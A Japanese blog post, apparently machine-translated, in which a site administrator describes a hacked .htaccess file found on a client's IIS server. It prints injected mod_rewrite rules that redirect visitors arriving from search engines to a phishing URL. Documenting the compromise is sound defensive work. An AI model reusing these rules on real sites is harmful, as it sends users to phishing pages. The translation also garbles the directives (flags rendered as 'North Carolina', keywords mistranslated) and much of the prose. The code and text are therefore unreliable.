私はごく最近のために、クライアントのウェブサイトの問題を発見した .htaccessファイル ファイル. サイトでホストされていた Windowsの サーバーの実行中 IIS 使用 IISPassword, これを利用している .htaccessファイル その設定用のファイル.

IISPasswordはとまったく同じルールに従っていない アパッチ 但し. 。htaccessファイルは、それを存在している場合 しなければならない IISPassword - 適切なルールが含まれている, そうでない場合、サーバは次のエラーが返されます。:

ここに。htaccessファイルの内容です. 私は適切にexample.comを指すように、最終的なリダイレクトURLを変更した:

RewriteEngine 上の
のRewriteCond %{HTTP_REFERER} .*グーグル。* $ [ノースカロライナ州,または]
のRewriteCond %{HTTP_REFERER} .*AOL。* $ [ノースカロライナ州,または]
のRewriteCond %{HTTP_REFERER} .*MSN。* $ [ノースカロライナ州,または]
のRewriteCond %{HTTP_REFERER} .*ヤフー。* $ [ノースカロライナ州,または]
のRewriteCond %{HTTP_REFERER} .*Yandexの。* $ [ノースカロライナ州,または]
のRewriteCond %{HTTP_REFERER} .*ランブラー。* $ [ノースカロライナ州,または]
のRewriteCond %{HTTP_REFERER} .*すでに。$ [ノースカロライナ州]
するRewriteRule .* HTTP://梅毒にかかったフィッシング -  url.example.com [R,ザ·]

この場合 た でApacheを実行しているサーバー上の mod_rewriteの, ほとんどのWebユーザが正しいサイトコンテンツに直接行く. 彼らは。htaccessファイルにリストされている検索エンジンとインデックスを通じてサイトに到達した場合にのみ、, 彼らはクラッカーが被害者が達したいと思う梅毒にかかったフィッシングURLにリダイレクトされます.

もちろん, クラッカー (あるいはおそらく自動化されたワーム) 問題のサーバがあっても、これらのmod_rewriteルールをサポートしていないことを認識していなかった. しかし、どちらにしても, 私はサイトであるかどうかについて多くの引数を予見することができますように、これは非常に憂慮すべきである 仕事…